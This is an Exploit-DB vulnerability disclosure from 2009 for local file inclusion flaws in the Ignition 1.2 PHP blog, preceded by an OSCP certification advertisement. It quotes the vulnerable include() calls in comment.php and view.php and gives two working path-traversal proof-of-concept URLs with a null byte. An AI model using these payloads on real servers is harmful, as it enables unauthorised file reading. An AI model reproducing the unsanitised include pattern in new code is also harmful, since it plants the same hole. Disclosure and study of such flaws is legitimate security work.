Ignition 1.2 - Multiple Local File Inclusions

EDB-ID:

10569




Platform:

PHP

Date:

2009-12-20


Become a Certified Penetration Tester

Enroll in Penetration Testing with Kali Linux and pass the exam to become an Offensive Security Certified Professional (OSCP). All new content for 2020.

GET CERTIFIED

Ignition 1.2 Multiple Local File Inclusion Vulnerabilities
disclosed by cOndemned
download: http://launchpadlibrarian.net/27567060/ignition_1.2.zip
note: magic_quotes_gpc should be turned off in order to exploit this vulnerability
greetz: all friends, SecurityReason team :)


comment.php

	1.	<?php 
	2.	session_start();
	3.	require ('settings.php');
	4.	include ('posts/'.$_GET['blog'].'.txt');			# [1]
	5.	?>


view.php

	1.	<?php
	2.	session_start();
	3.	require ('settings.php');
	4.	$blog = $_GET['blog'];
	5.	if (file_exists('posts/'.$_GET['blog'].'.txt')) {
	6.	include ('posts/'.$_GET['blog'].'.txt');			# [2]
	7.	}else{


proof of concept:

	[1] http://[attacked_box]/[ignition1.2]/comment.php?blog=../../../../[local_file]%00
	[2] http://[attacked_box]/[ignition1.2]/view.php?blog=../../../../../[local_file]%00